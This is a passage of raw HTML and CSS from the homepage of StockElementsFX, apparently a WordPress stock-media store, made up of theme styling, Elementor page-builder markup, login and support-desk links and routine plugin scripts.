background:#e7e3e3; } footer.main-footer:after{ background: url(https://teconce.com/preview/mayosis/maindemo/wp-content/uploads/2018/04/footer-shape.png) 100% 100% no-repeat; } .main-blog-promo:after{ background: url(https://themeplanet.club/wp-content/uploads/2018/04/ISO-Cube-Lines.png) 100% 100% no-repeat; } .product-main-header:after{ background: url(https://teconce.com/preview/mayosis/maindemo/wp-content/uploads/2018/04/ISO-Cube-Lines.png) 100% 100% no-repeat; } footer.main-footer,.footer-text,.footer-sidebar ul li a,.without-bg-social a,.mx-widget-counter h2,.main-footer a,.main-footer ul li a{ color:#282837; } .footer-widget-title,.footer-sidebar .widget-title{ color:#09090a; } .main-footer .sidebar-blog-categories ul li a,.main-footer .recent_post_widget a, .main-footer .recent_post_widget p,.main-footer .widget-products a,.main-footer .widget-products p,.main-footer .sidebar-blog-categories ul li{ color:#282837 !important; } .additional-footer,div.wpcf7-validation-errors, div.wpcf7-acceptance-missing{ border-color:#282837; } .back-to-top{ background-color:#ffffff; border-color:#ffffff; color:#e7e3e3; } footer .social-profile a{ background:#1e0050; } .copyright-footer{ background:#1e0050; color:#ffffff; } .copyright-text{ color:#ffffff; } .footer-widget .sidebar-theme .single-news-letter .nl__item--submit{ background-color:#282837; border-color:#282837; color:#e7e3e3; } .footer-widget input[type="text"], .footer-widget input[type="email"], .footer-widget input[type="password"],.footer-widget input[type="text"]::placeholder, .footer-widget input[type="email"]::placeholder, .footer-widget input[type="password"]::placeholder{ color:#282837 !important; } .footer-widget input[type="text"],.footer-widget input[type="email"],.footer-widget input[type="password"]{ background:transparent !important; border-color:#ffffff !important; border-width:2px; } /**End Footer Style**/ /**Widget Style**/ .theme--sidebar--widget{ background: #e9edf7 !important; padding: 10px 30px; border-radius:3px; } .theme--sidebar--widget .widget-title{ text-align:center; color:#ffffff; padding: 23px; margin: -10px -30px; margin-bottom: 20px; } .theme--sidebar--widget .input-group.sidebar-search,.theme--sidebar--widget .search-field{ margin:20px 0; } .sidebar-theme .search-form input[type=search],.sidebar-theme input[type=text],.sidebar-theme input[type=email],.sidebar-theme input[type=password],.sidebar--search--blog .search-form input[type=search],.theme--sidebar--widget select,.theme--sidebar--widget .search-field{ border-color:#28375a; } .theme--sidebar--widget .menu-item a{ color:#28375a; } .theme--sidebar--widget .single-news-letter .nl__item--submit{ background-color:#28375a !important; border-color:#28375a !important; } .product_widget_inside,.sidebar-theme ul{ padding:0; } .sidebar-blog-categories { padding: 0; margin-bottom: 30px; } .release-info{ padding:0 !important; } .widget-title,.post-tabs .nav-pills > li.active > a, .post-tabs .nav-pills > li.active > a:focus, .post-tabs .nav-pills > li.active > a:hover{ background:#1e0046; } .sidebar-theme .search-form input[type=search],.sidebar-theme input[type=text],.sidebar-theme input[type=email],.sidebar-theme input[type=password],.sidebar--search--blog .search-form input[type=search],.theme--sidebar--widget select{ background-color:transparent; border-color:#1e0050; border-width:2px; color:#28375a; } .sidebar-theme .single-news-letter .nl__item--submit { background:#1e0050; border-color:#1e0050; color:#ffffff; } /**End Widget Style**/ /**Start Product Style**/ .product-box,.grid_dm figure{ border-radius:3px; } .product-box,.dm-default-wrapper .edd_download_inner{ background:rgba(255,255,255,0); } .product-meta{ padding-top:0; padding-right:0; padding-bottom:0; padding-left:0; } .product-box .product-meta a, .product-box .product-meta,.product-box .count-download, .product-box .count-download .promo_price,.count-download span{ color:#28375a; } .product-main-header{ background: url(https://www.stockelementsfx.com/wp-content/uploads/2019/03/214210-P0L8ES-375-min-1.jpg) no-repeat !important; background-size:cover !important; } .featuredimagebg{ filter:blur(5px); transform:scale(1.1); } .featuredimagebg{ transform: translateX(1px) scale(1.1); background-attachment: fixed !important; } .single_main_header_products,.product-main-header .breadcrumb{ text-align:center; } .product-top-button-flex{ justify-content:center; } /** product Archive **/ .product-archive-breadcrumb,.product-archive-breadcrumb .parchive-page-title { color:#ffffff; text-align:center; } .product-archive-breadcrumb{ position: relative; } .featuredimageparchive{ background-repeat: no-repeat!important; background-size: cover!important; position: absolute; width: 100%; height: 100%; top: 0; left: 0; z-index: -1; } .product-archive-breadcrumb:before{ background:rgba(0,0,0,0) !important; width: 100%; height: 100%; position: absolute; top: 0; left: 0; z-index: 5; position: absolute; display: inline-block !important; } .featuredimageparchive{ filter:blur(8px); transform:scale(1.1); } .featuredimageparchive{ transform: translateX(1px) scale(1.1); background-attachment: fixed !important; } /**Start Blog Style**/ .main-post-promo,.page_breadcrumb, .single_author_box, .archive_bredcrumb_header{ background: linear-gradient(-135deg, #1e0046, #1e0064); } .featuredimagebgblog{ filter:blur(10px); transform:scale(1.1); } .featuredimagebgblog{ transform: translateX(1px) scale(1.1); background-attachment: fixed !important; } .single--post--content a, .single--post--content,h1.single-post-title,.product-style-one-meta,.product-style-one-meta a,.main-post-promo .single-user-info ul li.datearchive,.main-post-promo .single-post-breadcrumbs .breadcrumb a,.main-post-promo .single-user-info ul li a,.single-post-excerpt,.breadcrumb > .active,.main-post-promo .single-social-button,.main-post-promo .single-social-button a i, .single-post-breadcrumbs .breadcrumb > .active,.main-post-promo .blog--layout--contents{ color:#ffffff !important; } .comment-button a.btn,.social-button{ color:#ffffff; border-color:rgba(255,255,255,0.25); } .comment-button a.btn:hover,.social-button a i{ background-color:#ffffff !important; border-color:#ffffff !important; color:#000046 !important; } .ie8 .lblue, .lblue > span,.lblue.left-corner > span::before,.lblue.left-corner > span::after,.lblue.right-corner > span, .lblue.right-corner > span::before,.lblue.right-corner > span::after { background-color: #e6174b; background-image: -webkit-gradient(linear, left top, left bottom, from(#e6174b), to(#e6174b))!important; background-image: -webkit-linear-gradient(top, #e6174b,#e6174b) !important; background-image: -moz-linear-gradient(top, #e6174b, #e6174b) !important; background-image: -ms-linear-gradient(top, #e6174b, #e6174b) !important; background-image: -o-linear-gradient(top, #e6174b, #e6174b) !important; background-image: linear-gradient(to bottom, #e6174b, #e6174b) !important; } .lblue.left-edge::before { border-left-color: #b7133d !important; border-top-color: #b7133d !important; } .page_breadcrumb,.single_author_box,.archive_bredcrumb_header{ padding-top:195px; padding-bottom:117px; padding-right:0px; padding-left:0px; } .product-main-header,.main-post-promo,.product-archive-breadcrumb{ padding-top:225px; padding-bottom:120px; padding-right:0px; padding-left:0px; } .custombuttonmain.btn{ background:#3c465a !important; border-color:#3c465a !important; font-weight: 700; font-size: 18px; border-radius: 3px; } .custombuttona.btn{ background:#3c465a !important; border-color:#3c465a !important; border-width: 2px !important; padding: 12px 40px; font-weight: 700; font-size: 18px; border-radius: 3px; } .custombuttonb.btn{ border-width: 2px !important; padding: 12px 40px; font-weight: 700; font-size: 18px; border-radius: 3px; } .grid-testimonal-promo .testimonial_details{ background:#5a00f0; } .arrow-down{ border-top-color:#5a00f0; } .load-mayosis { background: linear-gradient(135deg, #5a0096, #00003c); } .loading.reversed li{ background-color:#5a0096; } /**End Product Style**/ .bottom_meta p a, .bottom_meta a{ border-color:rgba(40,55,90,0.25); color:#28375a; } .bottom_meta p a:hover, .bottom_meta a:hover{ background-color:#28375a; } .download_cat_filter,.search-btn::after,.download_cat_filter select option{ background-color:#5a00f0; color:#ffffff; } .product-search-form select{ color:#ffffff; } .product-search-form .search-fields{ background-color:#ffffff; } .product-search-form input[type="text"]{ border-color:#5a00f0; } .download-template-download-photo-template{ background:#e9ebf7; } .photo-template-author,.photo--section--image img { max-height: 750px; } .photo--section--image{ height: 750px; } .photo-credential{ min-height: 750px; max-height: 750px; } .photo--template--author--meta{ position:absolute; } .photo-template-author { background: #fcfdff; -webkit-box-shadow: 0px 4px 32px 0px rgba(15, 20, 30, 0.08); -moz-box-shadow: 0px 4px 32px 0px rgba(15, 20, 30, 0.08); box-shadow: 0px 4px 32px 0px rgba(15, 20, 30, 0.08); } .photo--template--button{ border-color:rgba(30,0,80,0.25); color:rgba(30,0,80,0.5); } </style> <noscript><style>.woocommerce-product-gallery{ opacity: 1 !important; }</style></noscript> <meta name="generator" content="Powered by WPBakery Page Builder - drag and drop page builder for WordPress."/> <!--[if lte IE 9]><link rel="stylesheet" type="text/css" href="https://www.stockelementsfx.com/wp-content/plugins/js_composer/assets/css/vc_lte_ie9.min.css" media="screen"><![endif]--> <style type="text/css"> .wpdigipro-sidemenu, .wpdigipro-horizontal-menu, .wpdigipro-menu-vertical, .wpdigipro-horizontal-menu .wpdigipro-sidebar .sub-menu li { background: url('https://www.stockelementsfx.com/wp-content/uploads/2018/08/nordwood-themes-387855-unsplash-1-1-1.jpg');background-size:cover; } .table>tbody>tr>td, .table>tbody>tr>th, .table>tfoot>tr>td, .table>tfoot>tr>th, .table>thead>tr>td, .table>thead>tr>th, .table>tbody>tr>td>p>a, .table>thead>tr>th, .wpdigipro-product-card p a, output,::-webkit-input-placeholder, .modal-popup input,#wpdigipro-file-input-message, .custom-file-control::after, .supportRequest .top-heading p{ color: !important; } .wpdigipro-product-card h4, .supportRequest .top-heading h4{ color: ; } .btn-info.btn-fill, .btn-info.btn-fill:active, #wpdigipro-change-password-modal span.head, .modal-popup button{ background: ; } #wpdigipro-change-user-password.modal-bg .modal-popup { border-bottom: 3px solid ; } .btn-info.btn-fill:hover, .modal-popup button:hover, .supportReplyContnet button.closeTicket:hover{ background: ; } .wpdigipro-sidemenu .nav li.active>a,.wpdigipro-sidemenu .nav li>a, .wpdigipro-sidemenu .wpdigipro-sidebar .sub-menu li a { background: rgba(, , , 0.33); border-color: rgba(, , , 0.33); } .wpdigipro-sidemenu .nav li a:hover{ background: ; border-color: ; } .wpdigipro-sidemenu .nav li.active>a, .wpdigipro-sidemenu .nav li>a, .wpdigipro-sidemenu .nav li>a p, .wpdigipro-sidemenu .wpdigipro-sidebar .sub-menu li a, .wpdigipro-horizontal-menu .nav li>a, .wpdigipro-horizontal-menu .nav li>a p{ color:; } .wpdigipro-dashboard-body .form-group label, .wpdigipro-dashboard-body .table tr th{ color: !important; } .form-control:focus{ box-shadow:none; } .wpdigipro-horizontal-menu .nav li .sub-menu >li>a:hover, .wpdigipro-horizontal-menu .nav li .sub-menu >li>a:hover{ background: ; } @media (max-width: 768px){ .wpdigipro-horizontal-menu .nav{background: url('https://www.stockelementsfx.com/wp-content/uploads/2018/08/nordwood-themes-387855-unsplash-1-1-1.jpg');} .wpdigipro-horizontal-menu .nav li>a, .wpdigipro-horizontal-menu .nav li.active>a, .wpdigipro-horizontal-menu .wpdigipro-sidebar .sub-menu li a { background: rgba(, , , 0.33); border-color: rgba(, , , 0.33); } .wpdigipro-horizontal-menu .menu-wrapper .nav>li>a:focus, .wpdigipro-horizontal-menu .menu-wrapper .nav>li>a:hover, .wpdigipro-horizontal-menu .wpdigipro-sidebar .sub-menu li a:hover, .wpdigipro-horizontal-menu .wpdigipro-sidebar li>span:hover + a, .wpdigipro-sidemenu .wpdigipro-sidebar li>span:hover + a{ background: ; border-color: ; } } </style> <noscript><style type="text/css"> .wpb_animate_when_almost_visible { opacity: 1; }</style></noscript><style id="yellow-pencil"> /* The following CSS generated by YellowPencil Plugin. https://waspthemes.com/yellow-pencil */ #mayosis-sidebar .mayosis-sidebar-header{background-color:#ffffff;min-height:78px;}#primary .page_breadcrumb{padding-bottom:98px !important;height:230px;}#primary .page_breadcrumb .container{position:relative;left:-5px;top:-89px;}.wpdigipro-buyer-email-form .image-field-group p{font-family:'Poppins', sans-serif;}#wpdigipro-buyer-email .modal-box-dialog .wpdigipro-buynow-popup-main-init .wpdigipro-buyer-email-form .image-field-group .wpdigipro-coupon-open{font-family:'Poppins', sans-serif !important;}.wpdigipro-buynow-price .prices-tag h1{font-family:'Poppins', sans-serif;}#couponcode{font-family:'Poppins', sans-serif;}.wpdigipro-coupon-form .form-field .enter-couponcode-box{font-family:'Poppins', sans-serif;}.wpdigipro-buyer-email-form .image-field-group .wpdigipro-coupon-open{text-shadow:none;} </style> <style id="yp-animate-listitem_animate_52"> @keyframes ListItem_Animate_52{ 0% {-webkit-box-shadow:rgba(51, 51, 51, 0.17) 0px 0px 10px 1px; box-shadow:rgba(51, 51, 51, 0.17) 0px 0px 10px 1px;-webkit-box-shadow:rgba(51, 51, 51, 0.17) 0px 0px 10px 1px;} 100% {-webkit-box-shadow:0px 8px 12px 1px rgba(51,51,51,0.17);-webkit-box-shadow:0px 8px 12px 1px rgba(51,51,51,0.17); box-shadow:0px 8px 12px 1px rgba(51,51,51,0.17);} } @-webkit-keyframes ListItem_Animate_52{ 0% {-webkit-box-shadow:rgba(51, 51, 51, 0.17) 0px 0px 10px 1px; box-shadow:rgba(51, 51, 51, 0.17) 0px 0px 10px 1px;-webkit-box-shadow:rgba(51, 51, 51, 0.17) 0px 0px 10px 1px;} 100% {-webkit-box-shadow:0px 8px 12px 1px rgba(51,51,51,0.17);-webkit-box-shadow:0px 8px 12px 1px rgba(51,51,51,0.17); box-shadow:0px 8px 12px 1px rgba(51,51,51,0.17);} } </style> <meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" /> </head> <body data-rsssl=1 class="home page-template page-template-elementor_canvas page page-id-417 woocommerce-no-js wpb-js-composer js-comp-ver-5.5.4 vc_responsive elementor-default elementor-template-canvas elementor-page elementor-page-417"> <div data-elementor-type="post" data-elementor-id="417" class="elementor elementor-417" data-elementor-settings="[]"> <div class="elementor-inner"> <div class="elementor-section-wrap"> <section data-id="3a70eff" class="elementor-element elementor-element-3a70eff elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;}" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="8424f72" class="elementor-element elementor-element-8424f72 elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="f34a99f" class="elementor-element elementor-element-f34a99f elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div data-id="99dcd92" class="elementor-element elementor-element-99dcd92 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">StockElementsFX</h2> </div> </div> <div data-id="ccfc5da" class="elementor-element elementor-element-ccfc5da elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="55044c7" class="elementor-element elementor-element-55044c7 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;classic&quot;}" data-element_type="section"> <div class="elementor-background-overlay"></div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="4e88ca4" class="elementor-element elementor-element-4e88ca4 elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="d639336" class="elementor-element elementor-element-d639336 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <section data-id="21d41a7" class="elementor-element elementor-element-21d41a7 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="0c9b1b0" class="elementor-element elementor-element-0c9b1b0 elementor-column elementor-col-100 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="be1f55a" class="elementor-element elementor-element-be1f55a elementor-align-center elementor-widget elementor-widget-button" data-element_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="https://www.stockelementsfx.com/login/" class="elementor-button-link elementor-button elementor-size-xl elementor-animation-grow" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Access Your Purchase/s Here</span> </span> </a> </div> </div> </div> <div data-id="734042d" class="elementor-element elementor-element-734042d elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> </div> </div> </section> <section data-id="c4731a9" class="elementor-element elementor-element-c4731a9 elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;}" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="fe11a62" class="elementor-element elementor-element-fe11a62 elementor-column elementor-col-50 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="cce2563" class="elementor-element elementor-element-cce2563 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div data-id="9a943f9" class="elementor-element elementor-element-9a943f9 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Best Stock Elements For Your Graphics and Videos</h2> </div> </div> <div data-id="4d6361b" class="elementor-element elementor-element-4d6361b elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">StockElementsFX Provides Top Quality Stock Media Assets For Your Projects At Unbeatable Prices.</h2> </div> </div> </div> </div> </div> <div data-id="e977040" class="elementor-element elementor-element-e977040 elementor-column elementor-col-50 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="189ad68" class="elementor-element elementor-element-189ad68 elementor-widget elementor-widget-image" data-element_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="600" height="529" src="https://www.stockelementsfx.com/wp-content/uploads/2018/12/undraw_making_art_759c-1-768x677.png" class="attachment-medium_large size-medium_large" alt="" srcset="https://www.stockelementsfx.com/wp-content/uploads/2018/12/undraw_making_art_759c-1-768x677.png 768w, https://www.stockelementsfx.com/wp-content/uploads/2018/12/undraw_making_art_759c-1-350x309.png 350w, https://www.stockelementsfx.com/wp-content/uploads/2018/12/undraw_making_art_759c-1-300x265.png 300w, https://www.stockelementsfx.com/wp-content/uploads/2018/12/undraw_making_art_759c-1-1024x903.png 1024w, https://www.stockelementsfx.com/wp-content/uploads/2018/12/undraw_making_art_759c-1.png 1101w" sizes="(max-width: 600px) 100vw, 600px" /> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="6c8dbbd" class="elementor-element elementor-element-6c8dbbd elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;}" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="59405cd" class="elementor-element elementor-element-59405cd elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="d1e2e08" class="elementor-element elementor-element-d1e2e08 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <section data-id="d2a5fb5" class="elementor-element elementor-element-d2a5fb5 elementor-section-content-middle elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="c4b89b9" class="elementor-element elementor-element-c4b89b9 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="22129e2" class="elementor-element elementor-element-22129e2 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">50,000</h2> </div> </div> </div> </div> </div> <div data-id="5460d23" class="elementor-element elementor-element-5460d23 elementor-column elementor-col-50 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-background-overlay"></div> <div class="elementor-widget-wrap"> <div data-id="e598fd5" class="elementor-element elementor-element-e598fd5 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Users</h2> </div> </div> </div> </div> </div> </div> </div> </section> <div data-id="a2b1d25" class="elementor-element elementor-element-a2b1d25 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="7ee513d" class="elementor-element elementor-element-7ee513d elementor-section-stretched elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-settings="{&quot;stretch_section&quot;:&quot;section-stretched&quot;,&quot;background_background&quot;:&quot;gradient&quot;,&quot;shape_divider_bottom&quot;:&quot;mountains&quot;}" data-element_type="section"> <div class="elementor-background-overlay"></div> <div class="elementor-shape elementor-shape-bottom" data-negative="false"> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 100" preserveAspectRatio="none"> <path class="elementor-shape-fill" opacity="0.33" d="M473,67.3c-203.9,88.3-263.1-34-320.3,0C66,119.1,0,59.7,0,59.7V0h1000v59.7 c0,0-62.1,26.1-94.9,29.3c-32.8,3.3-62.8-12.3-75.8-22.1C806,49.6,745.3,8.7,694.9,4.7S492.4,59,473,67.3z"/> <path class="elementor-shape-fill" opacity="0.66" d="M734,67.3c-45.5,0-77.2-23.2-129.1-39.1c-28.6-8.7-150.3-10.1-254,39.1 s-91.7-34.4-149.2,0C115.7,118.3,0,39.8,0,39.8V0h1000v36.5c0,0-28.2-18.5-92.1-18.5C810.2,18.1,775.7,67.3,734,67.3z"/> <path class="elementor-shape-fill" d="M766.1,28.9c-200-57.5-266,65.5-395.1,19.5C242,1.8,242,5.4,184.8,20.6C128,35.8,132.3,44.9,89.9,52.5C28.6,63.7,0,0,0,0 h1000c0,0-9.9,40.9-83.6,48.1S829.6,47,766.1,28.9z"/> </svg> </div> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="7ea8eb36" class="elementor-element elementor-element-7ea8eb36 elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="2669b5c9" class="elementor-element elementor-element-2669b5c9 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div data-id="45ec921e" class="elementor-element elementor-element-45ec921e elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">If You Require Any Assistance Please Contact Our Dedicated Support Team</h2> </div> </div> <div data-id="210eae5f" class="elementor-element elementor-element-210eae5f elementor-widget elementor-widget-image" data-element_type="image.default"> <div class="elementor-widget-container"> <div class="elementor-image"> <img width="296" height="296" src="https://media.publit.io/file/eqdL3fqS.webp" class="attachment-large size-large" alt="" /> </div> </div> </div> <div data-id="2348cc4c" class="elementor-element elementor-element-2348cc4c elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div data-id="7d1088ce" class="elementor-element elementor-element-7d1088ce elementor-align-center elementor-widget elementor-widget-button" data-element_type="button.default"> <div class="elementor-widget-container"> <div class="elementor-button-wrapper"> <a href="https://videoelementsfx.freshdesk.com/support/tickets/new" class="elementor-button-link elementor-button elementor-size-md elementor-animation-grow" role="button"> <span class="elementor-button-content-wrapper"> <span class="elementor-button-text">Please Click Here To Contact Our Support Desk</span> </span> </a> </div> </div> </div> <div data-id="304a4b5c" class="elementor-element elementor-element-304a4b5c elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> <div data-id="74234953" class="elementor-element elementor-element-74234953 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">Our typical response time is under 24 hours.</h2> </div> </div> <div data-id="1c90e027" class="elementor-element elementor-element-1c90e027 elementor-widget elementor-widget-heading" data-element_type="heading.default"> <div class="elementor-widget-container"> <h2 class="elementor-heading-title elementor-size-default">If you have not received a reply from us within 48 hours, please send us an email directly - support[at]videoelementsfx.com</h2> </div> </div> <div data-id="30a0abe6" class="elementor-element elementor-element-30a0abe6 elementor-widget elementor-widget-spacer" data-element_type="spacer.default"> <div class="elementor-widget-container"> <div class="elementor-spacer"> <div class="elementor-spacer-inner"></div> </div> </div> </div> </div> </div> </div> </div> </div> </section> <section data-id="3311be5" class="elementor-element elementor-element-3311be5 elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-top-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="9db20d2" class="elementor-element elementor-element-9db20d2 elementor-column elementor-col-100 elementor-top-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <section data-id="4a5cf1f" class="elementor-element elementor-element-4a5cf1f elementor-section-boxed elementor-section-height-default elementor-section-height-default elementor-section elementor-inner-section" data-element_type="section"> <div class="elementor-container elementor-column-gap-default"> <div class="elementor-row"> <div data-id="045ed01" class="elementor-element elementor-element-045ed01 elementor-column elementor-col-33 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="30777ad" class="elementor-element elementor-element-30777ad elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Our Products    <a href="https://www.stockelementsfx.com/freebies/">Freebies</a>    <a href="https://www.stockelementsfx.com/recommend-products/">Honest Product Reviews</a>    Special Deals</p></div> </div> </div> </div> </div> </div> <div data-id="4164f0e" class="elementor-element elementor-element-4164f0e elementor-column elementor-col-33 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="61f89f7e" class="elementor-element elementor-element-61f89f7e elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p><a href="https://www.videoelementsfx.com/terms-of-use" target="_blank" rel="noopener">Terms Of Use</a>    <a href="https://www.videoelementsfx.com/privacy-policy" target="_blank" rel="noopener">Privacy Policy</a>    <a href="https://videoelementsfx.freshdesk.com/helpdesk" target="_blank" rel="noopener">Help Desk</a></p></div> </div> </div> </div> </div> </div> <div data-id="60b32f3" class="elementor-element elementor-element-60b32f3 elementor-column elementor-col-33 elementor-inner-column" data-element_type="column"> <div class="elementor-column-wrap elementor-element-populated"> <div class="elementor-widget-wrap"> <div data-id="85e6e21" class="elementor-element elementor-element-85e6e21 elementor-shape-rounded elementor-widget elementor-widget-social-icons" data-element_type="social-icons.default"> <div class="elementor-widget-container"> <div class="elementor-social-icons-wrapper"> <a class="elementor-icon elementor-social-icon elementor-social-icon-facebook" href="" target="_blank"> <span class="elementor-screen-only">Facebook</span> <i class="fa fa-facebook"></i> </a> </div> </div> </div> </div> </div> </div> </div> </div> </section> <div data-id="b137fcf" class="elementor-element elementor-element-b137fcf elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>StockElementsFX.com &#8211; Part of the VideoElementsFX Family <span style="font-size: 1rem;">© 2019 All rights reserved</span></p></div> </div> </div> <div data-id="c121390" class="elementor-element elementor-element-c121390 elementor-widget elementor-widget-text-editor" data-element_type="text-editor.default"> <div class="elementor-widget-container"> <div class="elementor-text-editor elementor-clearfix"><p>Terms &amp; Conditions &#8211; Privacy Policy &#8211; Support and Contact &#8211; Return &amp; Refund Policy &#8211; Earnings Disclaimer &#8211; Affiliate Disclosure &#8211; Product Licence Agreement &#8211; GDPR &#8211; Data Protection Officer &#8211; Cookie Disclaimer  &#8211; DMCA</p></div> </div> </div> </div> </div> </div> </div> </div> </section> </div> </div> </div> <script type="text/javascript"> jQuery(document).on("DOMNodeInserted", function(){ // Lock uploads to "Uploaded to this post" jQuery('select.attachment-filters [value="uploaded"]').attr( 'selected', true ).parent().trigger('change'); }); </script> <script type="text/javascript"> var c = document.body.className; c = c.replace(/woocommerce-no-js/, 'woocommerce-js'); document.body.className = c; </script> <script type='text/javascript'> /* <![CDATA[ */ var wpcf7 = {"apiSettings":{"root":"https:\/\/www.stockelementsfx.com\/wp-json\/contact-form-7\/v1","namespace":"contact-form-7\/v1"}}; /* ]]> */ </script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.stockelementsfx.com/wp-content/plugins/use-your-drive/includes/js/ContactForm7.js?ver=1.11.9'></script> <script type='text/javascript'> /* <![CDATA[ */ var edd_scripts = {"ajaxurl":"https:\/\/www.stockelementsfx.com\/wp-admin\/admin-ajax.php","position_in_cart":"","has_purchase_links":"","already_in_cart_message":"You have already added this item to your cart","empty_cart_message":"Your cart is 